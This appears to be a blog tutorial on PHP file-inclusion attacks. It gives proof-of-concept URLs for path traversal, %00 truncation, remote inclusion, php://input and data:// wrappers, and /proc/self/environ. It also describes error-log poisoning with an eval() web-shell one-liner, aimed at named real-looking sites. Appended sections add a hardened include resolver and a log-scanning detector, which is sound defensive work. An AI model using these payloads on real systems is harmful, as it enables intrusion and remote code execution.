While I have some free time I am sorting out what I have studied and what still needs attention; next year I may be looking for work.
LFI (Local File Inclusion) vulnerabilities in PHP are familiar to everyone, and there are many papers on them, especially foreign ones...
Everyone is too lazy to test them, so I will sort them out here.
1. Common local inclusion;
<?php $query=$_GET['p']; include($query); ?>
PoC:
http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php
../hanguo/test.php is the included path.
As long as the target server allows uploads, whether jpg, txt or gif, it can include a one-sentence trojan. This method is very simple and there is nothing more to say.
2. Truncation local inclusion
require_once($a.'.php'); include($a.".php"); // and so on...
On WINDOWS this is particularly useful:
Truncation with \. or ./ or \ or / (on WINDOWS, . can also be used)
Reference: http://www.bkjia.com/Article/201208/147628.html
Truncation principle
Linux inclusion truncation example (on Linux, ./ and / can be used)
%00 truncation inclusion, restricted to gpc (magic_quotes_gpc) = Off and dependent on the PHP version
PoC:
http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php%00
3. Remote inclusion
With allow_url_include = On, Remote File Inclusion is possible; with Off, only local inclusion remains.
Test case:
<?php $query=$_GET['p'];include($query.".php"); ?>
Link:
http://www.xsser.com/explame.php?p=http://www.axxer.com/yeah.txt
An error occurred:
Warning: main(http://www.axxer.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
include($query.".php");
Because the code appends ".php", yeah.txt becomes yeah.txt.php.
Here we don't need to truncate it at all.
Create a yeah.php file at www.axxer.com;
then http://www.xsser.com/explame.php?p=http://www.axxer.com/yeah automatically gets .php appended. How lovely....
A small note on remote inclusion:
We can also use PHP's built-in protocols:
inclusion through the data:// or php://input pseudo-protocols.
This works for PHP 5.0; the test may fail on 5.3. It is still a good idea.
http://www.schnelltest24.de/index.php?page=/etc/passwd // This is not truncated. Let's try using the protocol instead.
Exploit through the protocol, then POST the exploit code. Haha~~~~
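Sections 1 to 3 all start from the same root cause: the include path is built from user input. As an added example (my own code, not from the original post), here is the vulnerable include beside a hardened version. The script name, the parameter p and the pages/ directory are assumptions; the self-test creates its own temporary files so it runs from the CLI without a web server. The php.ini setting allow_url_include = Off (section 3) should be used in addition, not instead.

```php
<?php
// Added example, not from the original post. The vulnerable function is the
// shape shown in sections 1-3; the hardened functions are what to replace it with.

// --- vulnerable: the attacker controls the whole path ---
function include_vulnerable(string $p): void
{
    include($p . ".php");   // ../x%00, http://host/yeah, php://input, data://... all reach here
}

// --- hardened: resolve against a fixed directory, then verify containment ---
function resolve_include(string $p, string $baseDir): ?string
{
    // 1. Accept only a plain page name. This alone rejects traversal (../),
    //    null bytes (%00) and every wrapper (php://, data://, http://).
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $p)) {
        return null;
    }
    // 2. Canonicalise base and candidate; realpath() resolves symlinks and
    //    returns false for files that do not exist.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $p . '.php');
    if ($candidate === false) {
        return null;
    }
    // 3. Defence in depth: the resolved file must still live under $base.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

function include_hardened(string $p, string $baseDir): bool
{
    $file = resolve_include($p, $baseDir);
    if ($file === null) {
        http_response_code(404);   // do not echo the rejected input back
        return false;
    }
    include $file;
    return true;
}

// Self-test from the CLI: php include_hardened.php
if (PHP_SAPI === 'cli') {
    $tmp = sys_get_temp_dir() . '/lfi_demo_' . getmypid();   // constructed scratch dir
    mkdir($tmp . '/pages', 0700, true);
    file_put_contents($tmp . '/pages/home.php', "<?php echo \"home page\\n\";");
    file_put_contents($tmp . '/secret.php', "<?php echo \"outside base dir\\n\";");

    $inputs = [
        'home',                                  // legitimate page
        '../secret',                             // traversal out of pages/
        "../secret\0",                           // null-byte truncation (section 2)
        '../../../../etc/passwd',                // section 1 PoC style
        'http://www.axxer.com/yeah',             // remote include (section 3)
        'php://input',                           // pseudo-protocol (section 3)
        'data://text/plain,hi',                  // pseudo-protocol (section 3)
    ];
    foreach ($inputs as $in) {
        $r = resolve_include($in, $tmp . '/pages');
        printf("%-28s => %s\n", addcslashes($in, "\0"), $r === null ? 'REJECTED' : $r);
    }
    include_hardened('home', $tmp . '/pages');   // prints "home page"

    unlink($tmp . '/pages/home.php');
    unlink($tmp . '/secret.php');
    rmdir($tmp . '/pages');
    rmdir($tmp);
}
```

Only "home" resolves; every other input is rejected by the name check before a filesystem call is made. An explicit map from page names to files is an equally good design when the set of pages is small and fixed.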
4. Log file inclusion: advanced exploitation
This link already reveals some tips; let's briefly describe the idea:
(1) Request a non-existent URL that contains a one-liner (http://www.ujn.edu.cn/<%3fphp eval($_REQUEST[s]);%3f>xxxxxxxx...); this request is recorded in the error.log file.
(2) Find the inclusion vulnerability and include the error.log file path, then pass our malicious code in the custom s parameter. (http://www.ujn.edu.cn/english/depart.php?s=phpinfo();&name=../../../../../../var/log/lighttpd/error.log/./././..........)
Restrictions and breakthroughs:
Take http://www.exp.com/index<?php eval($_POST[cmd]);?>.php
For such a request, some web servers URL-encode the spaces as %20 when writing the web log. If PHP then includes a statement like <?php%20eval($_POST[cmd]);?> it will certainly not succeed, so we must get literal spaces written into the web log.
You can do this by forging a request packet without the Connection HTTP header.
Reference 2: http://www.bkjia.com/Article/200810/30017.html
5. Other advanced exploitation
(1) Including the /proc/self/environ environment variables:
This relies on environment variables on Linux. In many cases this method does not work because there is no permission to access /proc/self/environ, just as with reading /etc/passwd.
(2) Brute-forcing the temporary phpinfo file and including it. // Depends on the situation; some cases require special characters such as %00 for truncation, as described above.
(3) Brute-forcing _SESSION files and including them. // Depends on the situation; some cases require special characters such as %00 for truncation, as described above.
phpinfo brute-force PDF
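From the defender's side, every technique in sections 1 to 5 leaves a recognisable trace in the web access log: traversal sequences, %00, stream wrappers, a full URL in a parameter, /proc/self/environ, a log file name in a parameter, or a PHP open tag in the request line (the log-poisoning step of section 4). As an added example (my own code, not part of the original post), this CLI script runs a set of such indicators over constructed log lines shaped like the post's PoCs; the log lines and the indicator names are constructed for this example.

```php
<?php
// Added example, not from the original post: flag inclusion attempts in
// combined-format access-log lines. Patterns mirror sections 1-5 of the post.

const LFI_INDICATORS = [
    'traversal'    => '~(?:\.\./|\.\.\\\\|%2e%2e%2f|%2e%2e/|\.\.%2f)~i',
    'null_byte'    => '~%00~',
    'wrapper'      => '~(?:php|data|expect|file|zip|phar)://~i',
    'remote_url'   => '~[?&][A-Za-z0-9_]+=(?:https?|ftp)://~i',
    'proc_environ' => '~/proc/self/environ~i',
    'log_file'     => '~/(?:access|error)[._-]?log~i',
    'php_tag'      => '~(?:<\?php|<%3fphp|%3c%3fphp)~i',   // poisoning payload in the request line
    'path_padding' => '~(?:/\.){8,}~',                     // /./././... truncation padding
];

// Return the names of every indicator that matches one log line.
function scan_log_line(string $line): array
{
    $hits = [];
    foreach (LFI_INDICATORS as $name => $re) {
        if (preg_match($re, $line)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Map 1-based line numbers to their hits; lines with no hits are omitted.
function scan_log(array $lines): array
{
    $alerts = [];
    foreach ($lines as $n => $line) {
        $hits = scan_log_line($line);
        if ($hits) {
            $alerts[$n + 1] = $hits;
        }
    }
    return $alerts;
}

// Constructed sample log: one benign request, then requests shaped like the
// post's PoCs (hosts and paths are the ones the post uses).
$sample = [
    '10.0.0.5 - - [01/Jan/2012:10:00:00 +0800] "GET /include.php?p=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2012:10:00:01 +0800] "GET /phpwite/include.php?p=../hanguo/test.php%00 HTTP/1.1" 200 33 "-" "curl/7.26"',
    '10.0.0.5 - - [01/Jan/2012:10:00:02 +0800] "GET /explame.php?p=http://www.axxer.com/yeah HTTP/1.1" 200 33 "-" "curl/7.26"',
    '10.0.0.5 - - [01/Jan/2012:10:00:03 +0800] "GET /index.php?page=php://input HTTP/1.1" 200 33 "-" "curl/7.26"',
    '10.0.0.5 - - [01/Jan/2012:10:00:04 +0800] "GET /<%3fphp eval($_REQUEST[s]);%3f>xxxx HTTP/1.1" 404 208 "-" "curl/7.26"',
    '10.0.0.5 - - [01/Jan/2012:10:00:05 +0800] "GET /english/depart.php?s=phpinfo();&name=../../../../../../var/log/lighttpd/error.log/./././././././././. HTTP/1.1" 200 33 "-" "curl/7.26"',
    '10.0.0.5 - - [01/Jan/2012:10:00:06 +0800] "GET /index.php?page=../../../proc/self/environ HTTP/1.1" 200 33 "-" "curl/7.26"',
];

if (PHP_SAPI === 'cli') {
    foreach (scan_log($sample) as $lineNo => $hits) {
        printf("line %d: %s\n", $lineNo, implode(', ', $hits));
    }
}
```

Line 1 produces no alert; lines 2 to 7 are flagged as traversal + null_byte, remote_url, wrapper, php_tag, traversal + log_file + path_padding, and traversal + proc_environ respectively. A request line carrying a PHP open tag with a 404 status is the signature of the poisoning step itself, before any inclusion has happened, which is why it is worth alerting on separately.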